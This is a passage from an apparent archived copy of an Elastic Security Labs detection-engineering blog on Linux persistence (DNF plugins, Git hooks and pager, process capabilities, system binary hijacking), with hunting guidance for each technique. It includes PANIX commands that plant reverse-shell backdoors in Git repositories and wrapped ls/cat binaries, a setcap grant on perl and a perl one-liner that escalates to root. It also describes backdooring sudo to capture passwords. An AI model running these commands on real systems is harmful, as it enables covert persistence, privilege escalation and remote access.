After triggering it through the sudo dnf update command, the dnf → sh → setsid → dnfcon → python reverse shell chain is initiated. Similar to before, our DNF coverage is multi-layered, and detects the following events:\r\nHunting for persistence through T1546.016 - installer packages\r\nHunting for package manager persistence can be conducted through ES|QL and OSQuery. Indicators of compromise may include configuration and plugin file creations/modifications and unusual child processes spawned by APT/YUM/DNF parents. The Persistence via Package Manager rule contains several ES|QL/OSQuery queries that you can use to detect these abnormalities.\r\nT1546 - event triggered execution: Git\r\nGit is a distributed version control system widely used for managing source code and coordinating collaborative software development. It tracks changes to files and enables efficient team collaboration across different locations. This makes Git a system that is present in many organizations, across both workstations and servers. Two functionalities that can be (ab)used for arbitrary code execution are Git hooks and the Git pager. MITRE has no specific technique attributed to these persistence mechanisms, but they would best fit T1546.\r\nT1546 - event triggered execution: Git hooks\r\nGit hooks are scripts that Git executes before or after specific events such as commits, merges, and pushes. These hooks are stored in the .git/hooks/ directory within each Git repository. They provide a mechanism for customizing and automating actions during the Git workflow. 
Common Git hooks include pre-commit, post-commit, pre-merge-commit, and post-merge.\r\nAn example of a Git hook would be the file .git/hooks/pre-commit, with the following contents:\r\n#!/bin/sh\r\n# Check if this is the initial commit\r\nif git rev-parse --verify HEAD >/dev/null 2>&1\r\nthen\r\n    echo "pre-commit: About to create a new commit..."\r\n    against=HEAD\r\nelse\r\n    echo "pre-commit: About to create the first commit..."\r\n    against=4b825dc642cb6eb9a060e54bf8d69288fbee4904\r\nfi\r\nAs these scripts are executed on specific actions, and their contents can be changed in whatever way the user wants, this method can be abused for persistence. Additionally, this method does not require root privileges, making it a convenient persistence technique for instances where root privileges have not yet been obtained. These scripts can also be added to GitHub repositories prior to cloning, turning them into initial access vectors as well.\r\nT1546 - event triggered execution: git pager\r\nA pager is a program used to view content one screen at a time. It allows users to scroll through text files or command output without the text scrolling off the screen. Common pagers include less, more, and pg. A Git pager is a specific use of a pager program to display the output of Git commands. Git allows users to configure a pager to control the display of commands such as git log.\r\nGit determines which pager to use through the following order of configuration:\r\n/etc/gitconfig (system-wide)\r\n~/.gitconfig or ~/.config/git/config (user-specific)\r\n.git/config (repository-specific)\r\nA typical configuration where a pager is specified might look like this:\r\n[core]\r\npager = less\r\nIn this example, Git is configured to use less as the pager. 
When a user runs a command like git log, Git will pipe the output through less for easier viewing. The flexibility in specifying a pager can be exploited. For example, an attacker can set the pager to a command that executes arbitrary code. This can be done by modifying the core.pager configuration to include malicious commands. Let’s take a look at the two techniques discussed in this section.\r\nPersistence through T1546 - Git\r\nTo test these techniques, the system requires a cloned Git repository. There is no point in setting up a custom repository, as the persistence mechanism depends on user actions, making a hidden and unused Git repository an illogical construct. You could initialize your own hidden repository and chain it together with a cron/systemd/udev persistence mechanism to initialize the repository at set intervals, but that is out of scope for now.\r\nTo test the Git hook technique, ensure a Git repository is available on the system, and run:\r\n> ./panix.sh --git --default --ip 192.168.1.1 --port 2014 --hook\r\n> [+] Created malicious pre-commit hook in /home/ruben/panix\r\nThe program loops through the entire filesystem (as far as is possible, based on permissions), finds all of the repositories, and backdoors them. To trigger the backdoor, run git add -A and git commit -m "backdoored!". This will generate the following events:\r\nEvents generated as a result of the Git Hook persistence establishment\r\nIn this figure we see PANIX looking for Git repositories, adding a pre-commit hook and granting it execution permissions, successfully planting the backdoor. 
Next, the backdoor is triggered by the git commit, and the git → pre-commit → nohup → setsid → bash reverse shell connection is initiated.\r\nTo test the Git pager technique, ensure a Git repository is available on the system and run:\r\n> ./panix.sh --git --default --ip 192.168.1.1 --port 2015 --pager\r\n> [+] Updated existing Git config with malicious pager in /home/ruben/panix\r\n> [+] Updated existing global Git config with malicious pager\r\nTo trigger the payload, move into the backdoored repository and run a command such as git log. This will trigger the following events:\r\nEvents generated as a result of the Git Pager persistence establishment\r\nPANIX executes and starts searching for Git repositories. Once found, the configuration files are updated or created, and the backdoor is planted. Invoking the Git pager (less) executes the backdoor, setting up the git → sh → nohup → setsid → bash reverse connection chain.\r\nWe have several layers of detection covering the Git Hook/Pager persistence techniques.\r\nHunting for persistence through T1546 - Git\r\nHunting for Git Hook/Pager persistence can be conducted through ES|QL and OSQuery. Potential indicators include file creations in the .git/hooks/ directories, Git hook executions, and the modification/creation of Git configuration files. The Git Hook/Pager Persistence hunting rule has several ES|QL and OSQuery queries that will aid in detecting this technique.\r\nT1548 - abuse elevation control mechanism: process capabilities\r\nProcess capabilities are a fine-grained access control mechanism that allows the division of the root user's privileges into distinct units. These capabilities can be independently enabled or disabled for processes, and are used to enhance security by limiting the privileges of processes. 
Instead of granting a process full root privileges, only the necessary capabilities are assigned, reducing the risk of exploitation. This approach follows the principle of least privilege.\r\nTo better understand them, consider some example use cases for process capabilities: assigning CAP_NET_BIND_SERVICE to a web server that needs to bind to port 80, assigning CAP_NET_RAW to tools that need access to network interfaces, or assigning CAP_DAC_OVERRIDE to backup software requiring access to all files. By leveraging these capabilities, processes can perform tasks that are usually only possible with root access.\r\nWhile process capabilities were developed to enhance security, once root privileges are acquired, attackers can abuse them to maintain persistence on a compromised system. By setting specific capabilities on binaries or scripts, attackers can ensure their malicious processes operate with elevated privileges, allowing for an easy way back to root access in case it is lost. Additionally, misconfigurations may allow attackers to escalate privileges.\r\nSome process capabilities can be (ab)used to establish persistence, escalate privileges, access sensitive data, or conduct other tasks. Process capabilities that can do this include, but are not limited to:\r\nCAP_SYS_MODULE (allows loading/unloading of kernel modules)\r\nCAP_SYS_PTRACE (enables tracing and manipulation of other processes)\r\nCAP_DAC_OVERRIDE (bypasses read/write/execute checks)\r\nCAP_DAC_READ_SEARCH (grants read access to any file on the system)\r\nCAP_SETUID / CAP_SETGID (manipulate UID/GID)\r\nCAP_SYS_ADMIN (to be honest, this just means root access)\r\nA simple way of establishing persistence is to grant a process the CAP_SETUID or CAP_SETGID capability (this is similar to setting the SUID/SGID bit on a binary, which we discussed in the previous persistence blog). But any of the ones above can be used, so be a bit creative here! 
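The kernel exposes these capability sets per process as hex bitmasks in /proc/&lt;pid&gt;/status (CapPrm, CapEff, and so on), which is handy when triaging a suspicious process. A minimal decoder, mapping only the capabilities listed above (bit numbers per linux/capability.h):

```python
# Capability bit numbers from linux/capability.h; only the dangerous
# capabilities discussed above are mapped here.
CAP_NAMES = {
    1: "CAP_DAC_OVERRIDE",
    2: "CAP_DAC_READ_SEARCH",
    6: "CAP_SETGID",
    7: "CAP_SETUID",
    16: "CAP_SYS_MODULE",
    19: "CAP_SYS_PTRACE",
    21: "CAP_SYS_ADMIN",
}

def decode_cap_mask(hex_mask: str) -> set:
    """Translate a hex capability mask (as printed in /proc/<pid>/status
    or captured in endpoint events) into the mapped capability names."""
    mask = int(hex_mask, 16)
    return {name for bit, name in CAP_NAMES.items() if mask & (1 << bit)}

def effective_caps(pid="self") -> set:
    """Read and decode the CapEff line of a process (Linux only)."""
    with open(f"/proc/{pid}/status") as status:
        for line in status:
            if line.startswith("CapEff:"):
                return decode_cap_mask(line.split()[1])
    return set()
```

For example, decode_cap_mask("80") returns only CAP_SETUID, since bit 7 is the CAP_SETUID bit.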
MITRE does not have a technique dedicated to process capabilities. Similar to Setuid/Setgid, this technique can be leveraged for both privilege escalation and persistence. The most logical technique to add this mechanism to (based on the existing structure of the MITRE ATT&CK framework) would be T1548.\r\nPersistence through T1548 - process capabilities\r\nLet’s leverage PANIX to set up a binary with the CAP_SETUID capability by running:\r\n> sudo ./panix.sh --cap --default\r\n[+] Capability setuid granted to /usr/bin/perl\r\n[-] ruby, is not present on the system.\r\n[-] php is not present on the system.\r\n[-] python is not present on the system.\r\n[-] python3, is not present on the system.\r\n[-] node is not present on the system.\r\nPANIX will by default check for a list of binaries that are easily exploitable after being granted the CAP_SETUID capability. You can use --custom and specify --capability and --binary to test some of your own.\r\nIf your system has Perl, you can take a look at GTFOBins to find out how to escalate privileges with this capability set.\r\n/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'\r\n# whoami\r\nroot\r\nLooking at the logs in Discover, we can see the following happening:\r\nEvents generated as a result of the Linux capability persistence establishment\r\nWe can see PANIX being executed with uid=0 (root), which grants cap_setuid+ep (effective and permitted) to /usr/bin/perl. Effective indicates that the capability is currently active for the process, while permitted indicates that the capability is allowed to be used by the process. Note that all events with uid=0 have all effective/permitted capabilities set. After granting this capability and dropping down to user permissions, perl is executed and manipulates its own process UID to obtain root access. 
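On disk, the grant PANIX just made is stored in the security.capability extended attribute of the binary, which gives a simple file-level hunting signal; a minimal sketch (assumes Linux; on other platforms, or when no capability is set, it returns None):

```python
import errno
import os

def file_capability(path: str):
    """Return the raw security.capability xattr of path, or None.

    setcap writes file capabilities into this extended attribute, so any
    binary where this returns bytes has capabilities assigned; compare the
    results of a filesystem sweep against an allowlist of binaries that
    are expected to carry capabilities (e.g. ping).
    """
    if not hasattr(os, "getxattr"):  # the xattr API is Linux-only in the stdlib
        return None
    try:
        return os.getxattr(path, "security.capability")
    except OSError as err:
        # ENODATA: no capability set; ENOTSUP: filesystem lacks xattrs;
        # ENOENT: path does not exist.
        if err.errno in (errno.ENODATA, errno.ENOTSUP, errno.ENOENT):
            return None
        raise
```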
Feel free to try out different binaries/permissions.\r\nAs we have quite an extensive list of rules related to process capabilities (covering discovery, persistence, and privilege escalation activity), we will not list all of them here. Instead, you can take a look at this blog post, which digs deeper into this topic.\r\nHunting for persistence through T1548 - process capabilities\r\nHunting for process capability persistence can be done through ES|QL. We can either do a general hunt for non-uid-0 binaries with capabilities set, or hunt for specific, potentially dangerous capabilities. To do so, we created the Process Capability Hunting rule.\r\nT1554 - compromise host software binary: hijacking system binaries\r\nAfter gaining access to a system and, if necessary, escalating privileges to root, system binary hijacking/wrapping is another option for establishing persistence. This method relies on the trust in, and frequent execution of, system binaries by users.\r\nSystem binaries, located in directories like /bin, /sbin, /usr/bin, and /usr/sbin, are commonly used by users/administrators to perform basic tasks. Attackers can hijack these system binaries by replacing or backdooring them with malicious counterparts. System binaries that are used often, such as cat, ls, cp, mv, less, or sudo, are perfect candidates, as this mechanism relies on the user executing the binary.\r\nThere are multiple ways to establish persistence through this method. The attacker may manipulate the system’s $PATH environment variable to prioritize a malicious binary over the regular system binary. Another method is to replace the real system binary with one that executes arbitrary malicious code on launch, after which the regular command is executed.\r\nAttackers can be creative in leveraging this technique, as any code can be executed. 
For example, the system-wide sudo/su binaries can be backdoored to capture a password every time a user attempts to run a command with sudo. Another approach is to establish a reverse connection, or call out to a backdoor binary, on each binary execution. As long as the attacker hides well and no errors are presented to the user, this technique is difficult to detect. MITRE does not have a direct reference to this technique, but it probably fits T1554 best.\r\nLet’s take a look at what hijacking system binaries might look like.\r\nPersistence through T1554 - hijacking system binaries\r\nThe implementation of system binary hijacking in PANIX leverages the wrapping of a system binary to establish a reverse connection to a specified IP. You can reference this example or set it up by executing:\r\n> sudo ./panix.sh --system-binary --default --ip 192.168.1.1 --port 2016\r\n> [+] cat backdoored successfully.\r\n> [+] ls backdoored successfully.\r\nNow, execute ls or cat to establish persistence. Let’s analyze the logs.\r\nEvents generated as a result of the Linux system binary hijacking persistence establishment\r\nIn the figure above we see PANIX executing, moving /usr/bin/ls to /usr/bin/ls.original. It then backdoors /usr/bin/ls to execute arbitrary code, after which it calls /usr/bin/ls.original in order to trick the user. Afterwards, we see bash setting up the reverse connection. The copying/renaming of system binaries and the hijacking of the sudo binary are captured in the following detection rules.\r\nHunting for persistence through T1554 - hijacking system binaries\r\nThis activity should be very uncommon, and therefore the detection rules above can be leveraged for hunting. Another way of hunting for this activity could be assembling a list of uncommon binaries that spawn child processes. 
To aid in this process we created the Unusual System Binary Parent (Potential System Binary Hijacking Attempt) hunting rule.\r\nConclusion\r\nIn this part of our “Linux Detection Engineering” series, we explored more advanced Linux persistence techniques and detection strategies, including init systems, run control scripts, message of the day, udev (rules), package managers, Git, process capabilities, and system binary hijacking. If you missed the previous part on persistence, catch up here.\r\nWe not only explained each technique but also demonstrated how to implement it using PANIX. This hands-on approach allowed you to assess detection capabilities in your own security setup. Our discussion included detection and endpoint rule coverage and referenced effective hunting strategies, from ES|QL aggregation queries to live OSQuery hunts.\r\nWe hope you've found this format informative. Stay tuned for more insights into Linux detection engineering. Happy hunting!\r\nSource: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms"
	],
	"report_names": [
		"sequel-on-persistence-mechanisms"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434462,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ac5e1ae9222a705f18b7ba216fa2fad095e0a9e6.pdf",
		"text": "https://archive.orkl.eu/ac5e1ae9222a705f18b7ba216fa2fad095e0a9e6.txt",
		"img": "https://archive.orkl.eu/ac5e1ae9222a705f18b7ba216fa2fad095e0a9e6.jpg"
	}
}